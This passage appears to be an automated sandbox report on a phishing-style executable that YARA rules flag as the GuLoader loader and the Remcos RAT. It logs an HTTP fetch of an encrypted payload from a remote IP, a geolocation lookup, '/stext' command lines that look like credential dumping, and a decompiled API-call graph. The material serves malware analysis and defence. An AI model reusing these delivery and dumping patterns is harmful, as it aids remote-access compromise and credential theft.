                                                                              Dec 6, 2024 09:59:45.202265978 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:45.202303886 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:46.925611973 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:47.045582056 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:47.045598030 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:47.045689106 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:47.045722961 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:47.045734882 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:47.045831919 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:47.045866013 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:47.046013117 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:47.046017885 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 09:59:47.046075106 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:47.046149015 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:47.046202898 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:47.165749073 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:47.165797949 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:47.165853977 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:47.165873051 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:47.165966988 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:47.165994883 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:47.166296005 CET240449818162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 09:59:47.166554928 CET498182404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 10:00:01.402234077 CET240449812162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 10:00:01.428059101 CET498122404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 10:00:01.547975063 CET240449812162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 10:00:31.429802895 CET240449812162.251.122.87192.168.2.5
                                                                              Dec 6, 2024 10:00:31.431437969 CET498122404192.168.2.5162.251.122.87
                                                                              Dec 6, 2024 10:00:31.551104069 CET240449812162.251.122.87192.168.2.5
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 6, 2024 09:59:42.042984962 CET5600853192.168.2.51.1.1.1
                                                                              Dec 6, 2024 09:59:42.188183069 CET53560081.1.1.1192.168.2.5
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Dec 6, 2024 09:59:42.042984962 CET192.168.2.51.1.1.10x9b2cStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Dec 6, 2024 09:59:42.188183069 CET1.1.1.1192.168.2.50x9b2cNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                              • 104.168.7.16
                                                                              • geoplugin.net
                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.549801104.168.7.16803872C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 6, 2024 09:59:35.955327034 CET174OUTGET /WonMNkIofA233.bin HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                              Host: 104.168.7.16
                                                                              Cache-Control: no-cache
                                                                              Dec 6, 2024 09:59:37.068244934 CET1236INHTTP/1.1 200 OK
                                                                              Date: Fri, 06 Dec 2024 08:59:36 GMT
                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                              Last-Modified: Thu, 05 Dec 2024 09:06:49 GMT
                                                                              ETag: "78640-6288237f2d276"
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 493120
                                                                              Content-Type: application/octet-stream
                                                                              Data Raw: 70 cc 3c 44 3e c4 d9 84 8d 93 ce 48 c1 96 60 9f d1 58 2c 50 ed 37 00 81 f1 14 6d 3c 0d 32 75 35 a8 dc 90 ab 85 7e 18 1e 82 7d 7c f2 86 f3 08 32 4e 27 7c e6 0f fe 92 66 6c 80 d0 a7 29 6d 0f 1f 19 9e 7c 5b d4 44 33 11 7a 1f 33 91 98 c0 02 90 51 49 a0 77 95 74 1a ec 74 bb 31 6a 33 90 e0 59 d0 37 2d 8a 8b 71 91 7b 5f 17 ec 0d 7d 03 b5 fa 87 d2 ca 1e f7 8b a6 3a 84 23 12 8d 3f c2 0d d7 5b 86 10 6a 52 93 04 cc 11 f1 f9 e5 41 d6 e8 ca b1 a3 07 a0 fe 8a d6 0a eb 87 a1 d4 c4 43 e1 6b 91 4a 8c ec db 61 d8 f9 c3 52 5d 7e 8f 3e 43 49 f2 a8 a9 2b 60 1e b2 e8 59 81 4a 84 25 f6 61 fe 29 77 d0 d9 7b 91 ee b1 28 93 4a 1e b2 fd 9f 7a 31 4d 31 27 96 f7 3f a2 5b 22 ee 1a 57 00 4c 1a bd 86 06 93 b1 15 6c 4e af 6a a4 19 a4 ee 9c 4f 94 d2 ae 3d 6a b7 34 eb 0c 94 88 66 00 a0 98 8f 51 6b 62 cb 75 91 32 11 ff d0 48 bd 0f c0 84 00 45 11 89 20 92 8e 0a e7 fc aa 27 ac ab 3f fc 70 1c fc d6 39 41 d8 fa 37 a4 99 62 82 30 7d d9 db 05 93 b8 fd 3f a5 40 6c af de 96 6d 0e e5 b4 a3 24 7a c0 c5 76 4a dc 76 e2 4c 13 b9 3c 5b 92 dc 1d f2 [TRUNCATED]
                                                                              Data Ascii: p<D>H`X,P7m<2u5~}|2N'|fl)m|[D3z3QIwtt1j3Y7-q{_}:#?[jRACkJaR]~>CI+`YJ%a)w{(Jz1M1'?["WLlNjO=j4fQkbu2HE '?p9A7b0}?@lm$zvJvL<["hk{(U+2Z1JvlV"9>bG_*2kXFBJ$(`zp_]tHm=vt6"-/Y!MhcR2WX&&,U2zTr2>$xY[.>])(20:JPo94HdY!e~@p3Acu4E]?""n5".E<qO$ZJp:Io5!H2.TDX^ST;7|i$[iTK+]Hr&@C'T;p(9F'^'Dyk1r#-=]sGOPcGcRy>0J`vT(9[>"~<!`l%NbE1|(%*=x*jk2lE=D9^JZCIXEF'.V&()E!V~H(Zh
                                                                              Dec 6, 2024 09:59:37.068272114 CET224INData Raw: 07 c9 f0 37 6a 43 e7 62 50 e0 7c 57 41 c8 d3 59 d7 24 a4 49 43 92 33 aa 1e ae c1 a2 e5 dc 33 77 03 9c cb 55 9c 88 c5 88 fd f8 56 b6 9a d9 a3 da 79 ab 08 5b 22 33 e4 48 ad 2a e2 f2 ae 80 c7 83 54 fc fd 54 38 72 f3 37 2c 32 eb f3 02 21 28 b9 3c 7d
                                                                              Data Ascii: 7jCbP|WAY$IC33wUVy["3H*TT8r7,2!(<}S\JPsMA82z2@^H6RD?s;sedqas^zIHP}*uIZO]Ye/YZ~:iOYY4K&#U<kIO+-.]
                                                                              Dec 6, 2024 09:59:37.068289042 CET1236INData Raw: 69 18 d8 77 82 34 63 33 e8 a3 ca 7c 5f 31 d4 6e fd aa 01 8b 93 29 6f 51 81 64 a8 f3 40 02 3d 7f 6f 78 d0 8c 50 2d 5f 2d b0 89 6e 28 7c 38 c2 3a 67 2e e5 92 10 68 9e f0 f2 9b d2 be 98 01 fe d5 91 a1 7c 2f ab 86 d2 fb 77 fc 91 39 4f d4 8a 9b 5b d3
                                                                              Data Ascii: iw4c3|_1n)oQd@=oxP-_-n(|8:g.h|/w9O[YE_D-pWtp!EQl<V'S ,e<eU(Vg3{aI] "1w6umGuxwc_BMb~5}MMM[K9wFB OHy/@j$
                                                                              Dec 6, 2024 09:59:37.068342924 CET1236INData Raw: 50 94 16 07 6a 8a 3f 10 52 d9 f8 41 a5 25 44 0a 94 4b d8 6a cb 4c b3 9d 46 c9 9d a9 39 6c be 0d 48 15 8d 62 d8 15 87 6d e0 18 19 20 7a 67 46 a2 d7 d3 06 c0 d7 3e fa 88 bb d9 8a 64 d8 ab 0d 50 24 de 4a 57 3d 20 df 57 39 94 ab fd f0 e6 4d 2d 4d e0
                                                                              Data Ascii: Pj?RA%DKjLF9lHbm zgF>dP$JW= W9M-M+aBRm'o!iq6$#iYU7Wqtoy^>96Nth6Z2YKVKeY4|!2|&@ZsD-LSW0'#k2$
                                                                              Dec 6, 2024 09:59:37.068485975 CET448INData Raw: ea 22 4b bf 6a 8f fb f0 3e 9a cc fb 44 52 a2 1f 21 74 5e 75 09 2d 2e 9f 4c 03 a6 75 17 bf e2 f6 4f a2 da 21 f6 61 94 f5 e0 a7 67 84 d9 94 86 8a 9c 93 48 f6 af 01 8d 6b 66 2c 28 27 f8 e6 f6 93 ec 83 ed cd 75 5d f7 f6 52 a4 59 db 47 f2 b9 97 67 29
                                                                              Data Ascii: "Kj>DR!t^u-.LuO!agHkf,('u]RYGg)Zf /h>t]m3 [%#v#:`y/v-p"mh^->#?E7ml#3%O{=pU[/U1Je^hVRFzjBB_5
                                                                              Dec 6, 2024 09:59:37.068500996 CET1236INData Raw: a5 58 29 d6 cc 40 45 26 09 bd aa 65 3c 4d 92 08 13 2d 59 7c 85 4f 47 58 c0 57 e6 8b f8 dc 4e 56 af 6e b9 46 c2 85 90 74 ad c5 78 11 62 2e 1d 9d 0f 1b 0f 53 01 4f c2 af 3a a7 1d b5 0e 44 06 5e 50 ed 35 74 56 1d df 7f 06 82 ef 1c 1c fd 85 3f e3 46
                                                                              Data Ascii: X)@E&e<M-Y|OGXWNVnFtxb.SO:D^P5tV?F7Vb|)7uVWe"^\oEpd1T`X##|F-V^^'X ,;5,r T)77gA6:imt5(d[xzw:T
                                                                              Dec 6, 2024 09:59:37.068514109 CET224INData Raw: d2 74 f2 ad 34 bb 31 e1 7f b4 e4 09 38 42 25 8a 8b 28 53 73 5f ff d4 f2 82 fc 3e 2a 6f e8 35 e1 08 00 ac 50 9c 08 1a 06 f6 5a 54 20 ac 5a fc ef a3 cf f1 04 30 49 7c 69 f8 fd 43 94 30 3e d3 2f 73 bc 3a 88 01 2c df 74 4c cf 8a 04 e5 3b b8 76 8f 37
                                                                              Data Ascii: t418B%(Ss_>*o5PZT Z0I|iC0>/s:,tL;v7pVq7Gs}:GCLo{]Jic|}TN{Q_f19t)\oyS=Z}.w'D;^Rv|P_ve?.
                                                                              Dec 6, 2024 09:59:37.068526983 CET1236INData Raw: d7 bd 1a fb ed b7 32 45 a2 aa 6d 54 24 92 5c c0 76 4a 85 2f 7b ca 46 32 9c 0b c1 1a 33 9f bd 3e 66 46 77 de 97 1e 1a 93 eb 52 a8 02 79 ed 94 ec 24 ec 09 5a 86 fc 18 34 15 31 1f 36 d9 78 fc 21 2f f6 34 4d a9 ad 1e 9d 7a b2 88 1f 11 47 08 30 1d 59
                                                                              Data Ascii: 2EmT$\vJ/{F23>fFwRy$Z416x!/4MzG0Y?s:zX`\+`HCH\}=WVN/-i|?|V!.Mc2OjBWR$TBsMk@iw43X~Qj=}-Ogy:1*Sy9`
                                                                              Dec 6, 2024 09:59:37.068540096 CET1236INData Raw: fc b8 1c cd 2d 57 a5 27 f6 a2 0f 14 16 cf 3f ac f6 f6 f8 ed 23 8d f3 b5 33 fe 16 cd f9 60 f3 3b 8f 8d 51 4c 2f 0b a6 36 01 57 8c 00 d4 27 87 1b 2f 1d 96 2c f2 80 5c ef bd 3c f3 45 45 b0 24 74 7b 2a 4c 3e 82 2b 60 fc 89 fe 60 be 50 63 ea 1b e2 81
                                                                              Data Ascii: -W'?#3`;QL/6W'/,\<EE$t{*L>+``Pc\h>MmBp"fSqr/@'F{nUJm@oAKv"HD<1qL%gk|5nYs\Y;eDQsf"Yzn
                                                                              Dec 6, 2024 09:59:37.068658113 CET1236INData Raw: ab 03 74 10 1c 52 7a 4c 3c bb 98 e7 fd 55 0c 99 d4 ef 04 ac 71 df e5 d4 5e 8e db 56 2a 6c e9 69 32 be 4c 2c f6 3d e8 ec 2e b3 52 00 01 16 b6 e4 54 4c ec 54 59 fe a0 57 75 6b ad 65 fa d9 b2 76 34 57 cb b7 db 25 8d 12 87 f7 b2 88 dd d4 84 f9 5d c8
                                                                              Data Ascii: tRzL<Uq^V*li2L,=.RTLTYWukev4W%]MjQnIX/0:*Z)f$MMs?f|08*s i|'l7#)oQ-Mm){zYih"*p9m*`;l<yuKjp
                                                                              Dec 6, 2024 09:59:37.188186884 CET1236INData Raw: 49 cc a0 0a 8a 7b ef 8c d7 95 e8 48 a2 fa ad cc d9 30 23 92 16 2c 45 b8 70 d6 c0 b8 b3 e9 30 76 7d c8 c1 b5 41 e4 95 a5 b7 d4 f1 35 70 e4 11 73 e6 d2 14 5a e7 63 35 77 85 d2 8d 65 8e f6 bf 0d c9 54 3d b8 d5 6e e3 75 34 d1 00 4c 43 90 b4 76 06 91
                                                                              Data Ascii: I{H0#,Ep0v}A5psZc5weT=nu4LCv}='78UCzI;`;vH%HP@1U}EQ}87Pw.L&;?#+A6%*Q7xJX>!B!h%9IZi


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.549819178.237.33.50803872C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 6, 2024 09:59:42.312772989 CET71OUTGET /json.gp HTTP/1.1
                                                                              Host: geoplugin.net
                                                                              Cache-Control: no-cache
                                                                              Dec 6, 2024 09:59:43.555100918 CET1171INHTTP/1.1 200 OK
                                                                              date: Fri, 06 Dec 2024 08:59:43 GMT
                                                                              server: Apache
                                                                              content-length: 963
                                                                              content-type: application/json; charset=utf-8
                                                                              cache-control: public, max-age=300
                                                                              access-control-allow-origin: *
                                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                              Data Ascii: { "geoplugin_request":"8.46.123.228", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:03:58:33
                                                                              Start date:06/12/2024
                                                                              Path:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\scan_241205-801_draft_PO.exe"
                                                                              Imagebase:0x400000
                                                                              File size:1'270'336 bytes
                                                                              MD5 hash:16DF1BBB45F31EF099862D1DF04B9741
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2579216350.0000000006434000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:4
                                                                              Start time:03:59:26
                                                                              Start date:06/12/2024
                                                                              Path:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\scan_241205-801_draft_PO.exe"
                                                                              Imagebase:0x400000
                                                                              File size:1'270'336 bytes
                                                                              MD5 hash:16DF1BBB45F31EF099862D1DF04B9741
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.3267786556.00000000032C2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.3266189424.000000000019F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.3267786556.00000000032DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:5
                                                                              Start time:03:59:44
                                                                              Start date:06/12/2024
                                                                              Path:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe /stext "C:\Users\user\AppData\Local\Temp\vxhtinfano"
                                                                              Imagebase:0x400000
                                                                              File size:1'270'336 bytes
                                                                              MD5 hash:16DF1BBB45F31EF099862D1DF04B9741
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:6
                                                                              Start time:03:59:44
                                                                              Start date:06/12/2024
                                                                              Path:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe /stext "C:\Users\user\AppData\Local\Temp\fzumjfqbbwepy"
                                                                              Imagebase:0x400000
                                                                              File size:1'270'336 bytes
                                                                              MD5 hash:16DF1BBB45F31EF099862D1DF04B9741
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:7
                                                                              Start time:03:59:44
                                                                              Start date:06/12/2024
                                                                              Path:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\scan_241205-801_draft_PO.exe /stext "C:\Users\user\AppData\Local\Temp\itzekyavpewuiglw"
                                                                              Imagebase:0x400000
                                                                              File size:1'270'336 bytes
                                                                              MD5 hash:16DF1BBB45F31EF099862D1DF04B9741
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:36.6%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:21.5%
                                                                                Total number of Nodes:493
                                                                                Total number of Limit Nodes:10
                                                                                execution_graph 1850 402df3 1851 402e05 SetTimer 1850->1851 1852 402e1e 1850->1852 1851->1852 1853 402e73 1852->1853 1854 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 1852->1854 1854->1853 1269 403d35 1270 403e88 1269->1270 1271 403d4d 1269->1271 1273 403ed9 1270->1273 1274 403e99 GetDlgItem GetDlgItem 1270->1274 1271->1270 1272 403d59 1271->1272 1276 403d64 SetWindowPos 1272->1276 1277 403d77 1272->1277 1275 403f33 1273->1275 1286 401389 2 API calls 1273->1286 1278 40420e 18 API calls 1274->1278 1300 403e83 1275->1300 1340 40425a 1275->1340 1276->1277 1280 403d94 1277->1280 1281 403d7c ShowWindow 1277->1281 1282 403ec3 SetClassLongW 1278->1282 1283 403db6 1280->1283 1284 403d9c DestroyWindow 1280->1284 1281->1280 1285 40140b 2 API calls 1282->1285 1287 403dbb SetWindowLongW 1283->1287 1288 403dcc 1283->1288 1339 404197 1284->1339 1285->1273 1289 403f0b 1286->1289 1287->1300 1290 403e75 1288->1290 1291 403dd8 GetDlgItem 1288->1291 1289->1275 1292 403f0f SendMessageW 1289->1292 1379 404275 1290->1379 1295 403e08 1291->1295 1296 403deb SendMessageW IsWindowEnabled 1291->1296 1292->1300 1293 40140b 2 API calls 1307 403f45 1293->1307 1294 404199 DestroyWindow EndDialog 1294->1339 1301 403e15 1295->1301 1304 403e5c SendMessageW 1295->1304 1305 403e28 1295->1305 1313 403e0d 1295->1313 1296->1295 1296->1300 1298 4041c8 ShowWindow 1298->1300 1301->1304 1301->1313 1303 40420e 18 API calls 1303->1307 1304->1290 1308 403e30 1305->1308 1309 403e45 1305->1309 1306 403e43 1306->1290 1307->1293 1307->1294 1307->1300 1307->1303 1330 4040d9 DestroyWindow 1307->1330 1343 4062b9 1307->1343 1360 40420e 1307->1360 1373 40140b 1308->1373 1310 40140b 2 API calls 1309->1310 1312 403e4c 1310->1312 1312->1290 1312->1313 1376 4041e7 1313->1376 1315 403fc0 GetDlgItem 1316 403fd5 1315->1316 1317 403fdd ShowWindow KiUserCallbackDispatcher 1315->1317 1316->1317 1363 404230 KiUserCallbackDispatcher 1317->1363 1319 404007 EnableWindow 1320 40401b 1319->1320 1321 404020 GetSystemMenu EnableMenuItem SendMessageW 1320->1321 1364 404243 SendMessageW 1320->1364 1365 403d16 1320->1365 1368 406297 lstrcpynW 1320->1368 1321->1320 1322 404050 SendMessageW 1321->1322 1322->1320 1326 40407f lstrlenW 1327 4062b9 17 API calls 1326->1327 1328 404095 SetWindowTextW 1327->1328 1369 401389 1328->1369 1331 4040f3 CreateDialogParamW 1330->1331 1330->1339 1332 404126 1331->1332 1331->1339 1333 40420e 18 API calls 1332->1333 1334 404131 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 1333->1334 1335 401389 2 API calls 1334->1335 1336 404177 1335->1336 1336->1300 1337 40417f ShowWindow 1336->1337 1338 40425a SendMessageW 1337->1338 1338->1339 1339->1298 1339->1300 1341 404272 1340->1341 1342 404263 SendMessageW 1340->1342 1341->1307 1342->1341 1358 4062c6 1343->1358 1344 406511 1345 406527 1344->1345 1409 406297 lstrcpynW 1344->1409 1345->1307 1347 4064df lstrlenW 1347->1358 1350 4062b9 10 API calls 1350->1347 1352 4063f4 GetSystemDirectoryW 1352->1358 1353 406407 GetWindowsDirectoryW 1353->1358 1355 40643b SHGetSpecialFolderLocation 1355->1358 1359 406453 SHGetPathFromIDListW CoTaskMemFree 1355->1359 1356 4062b9 10 API calls 1356->1358 1357 406482 lstrcatW 1357->1358 1358->1344 1358->1347 1358->1350 1358->1352 1358->1353 1358->1355 1358->1356 1358->1357 1393 406165 1358->1393 1398 40652b 1358->1398 1407 4061de wsprintfW 1358->1407 1408 406297 lstrcpynW 1358->1408 1359->1358 1361 4062b9 17 API calls 1360->1361 1362 404219 SetDlgItemTextW 1361->1362 1362->1315 1363->1319 1364->1320 1366 4062b9 17 API calls 1365->1366 1367 403d24 SetWindowTextW 1366->1367 1367->1320 1368->1326 1371 401390 1369->1371 1370 4013fe 1370->1307 1371->1370 1372 4013cb MulDiv SendMessageW 1371->1372 1372->1371 1374 401389 2 API calls 1373->1374 1375 401420 1374->1375 1375->1313 1377 4041f4 SendMessageW 1376->1377 1378 4041ee 1376->1378 1377->1306 1378->1377 1380 404338 1379->1380 1381 40428d GetWindowLongW 1379->1381 1380->1300 1381->1380 1382 4042a2 1381->1382 1382->1380 1383 4042d2 1382->1383 1384 4042cf GetSysColor 1382->1384 1385 4042e2 SetBkMode 1383->1385 1386 4042d8 SetTextColor 1383->1386 1384->1383 1387 404300 1385->1387 1388 4042fa GetSysColor 1385->1388 1386->1385 1389 404307 SetBkColor 1387->1389 1390 404311 1387->1390 1388->1387 1389->1390 1390->1380 1391 404324 DeleteObject 1390->1391 1392 40432b CreateBrushIndirect 1390->1392 1391->1392 1392->1380 1410 406104 1393->1410 1396 4061c9 1396->1358 1397 406199 RegQueryValueExW RegCloseKey 1397->1396 1401 406538 1398->1401 1399 4065ae 1400 4065b3 CharPrevW 1399->1400 1403 4065d4 1399->1403 1400->1399 1401->1399 1402 4065a1 CharNextW 1401->1402 1405 40658d CharNextW 1401->1405 1406 40659c CharNextW 1401->1406 1414 405b99 1401->1414 1402->1399 1402->1401 1403->1358 1405->1401 1406->1402 1407->1358 1408->1358 1409->1345 1411 406113 1410->1411 1412 406117 1411->1412 1413 40611c RegOpenKeyExW 1411->1413 1412->1396 1412->1397 1413->1412 1415 405b9f 1414->1415 1416 405bb5 1415->1416 1417 405ba6 CharNextW 1415->1417 1416->1401 1417->1415 1418 40336c SetErrorMode GetVersion 1419 4033ab 1418->1419 1420 4033b1 1418->1420 1421 406671 5 API calls 1419->1421 1508 406601 GetSystemDirectoryW 1420->1508 1421->1420 1423 4033c7 lstrlenA 1423->1420 1424 4033d7 1423->1424 1511 406671 GetModuleHandleA 1424->1511 1427 406671 5 API calls 1428 4033e5 1427->1428 1429 406671 5 API calls 1428->1429 1430 4033f1 #17 OleInitialize SHGetFileInfoW 1429->1430 1517 406297 lstrcpynW 1430->1517 1433 40343d GetCommandLineW 1518 406297 lstrcpynW 1433->1518 1435 40344f 1436 405b99 CharNextW 1435->1436 1437 403474 CharNextW 1436->1437 1438 40359e GetTempPathW 1437->1438 1448 40348d 1437->1448 1519 40333b 1438->1519 1440 4035b6 1441 403610 DeleteFileW 1440->1441 1442 4035ba GetWindowsDirectoryW lstrcatW 1440->1442 1529 402edd GetTickCount GetModuleFileNameW 1441->1529 1443 40333b 12 API calls 1442->1443 1446 4035d6 1443->1446 1444 405b99 CharNextW 1444->1448 1446->1441 1449 4035da GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 1446->1449 1447 403624 1450 4036d7 1447->1450 1455 4036c7 1447->1455 1459 405b99 CharNextW 1447->1459 1448->1444 1452 403589 1448->1452 1454 403587 1448->1454 1453 40333b 12 API calls 1449->1453 1631 4038ad 1450->1631 1613 406297 lstrcpynW 1452->1613 1457 403608 1453->1457 1454->1438 1557 403987 1455->1557 1457->1441 1457->1450 1472 403643 1459->1472 1461 403811 1464 403895 ExitProcess 1461->1464 1465 403819 GetCurrentProcess OpenProcessToken 1461->1465 1462 4036f1 1638 4058fd 1462->1638 1470 403831 LookupPrivilegeValueW AdjustTokenPrivileges 1465->1470 1471 403865 1465->1471 1468 4036a1 1614 405c74 1468->1614 1469 403707 1642 405868 1469->1642 1470->1471 1475 406671 5 API calls 1471->1475 1472->1468 1472->1469 1478 40386c 1475->1478 1481 403881 ExitWindowsEx 1478->1481 1482 40388e 1478->1482 1479 403728 lstrcatW lstrcmpiW 1479->1450 1484 403744 1479->1484 1480 40371d lstrcatW 1480->1479 1481->1464 1481->1482 1485 40140b 2 API calls 1482->1485 1487 403750 1484->1487 1488 403749 1484->1488 1485->1464 1486 4036bc 1630 406297 lstrcpynW 1486->1630 1650 40584b CreateDirectoryW 1487->1650 1645 4057ce CreateDirectoryW 1488->1645 1492 403755 SetCurrentDirectoryW 1494 403770 1492->1494 1495 403765 1492->1495 1654 406297 lstrcpynW 1494->1654 1653 406297 lstrcpynW 1495->1653 1498 4062b9 17 API calls 1499 4037af DeleteFileW 1498->1499 1500 4037bc CopyFileW 1499->1500 1502 40377e 1499->1502 1500->1502 1501 403805 1503 40605d 36 API calls 1501->1503 1502->1498 1502->1501 1505 4062b9 17 API calls 1502->1505 1507 4037f0 CloseHandle 1502->1507 1655 40605d MoveFileExW 1502->1655 1659 405880 CreateProcessW 1502->1659 1503->1450 1505->1502 1507->1502 1509 406623 wsprintfW LoadLibraryExW 1508->1509 1509->1423 1512 406697 GetProcAddress 1511->1512 1513 40668d 1511->1513 1515 4033de 1512->1515 1514 406601 3 API calls 1513->1514 1516 406693 1514->1516 1515->1427 1516->1512 1516->1515 1517->1433 1518->1435 1520 40652b 5 API calls 1519->1520 1521 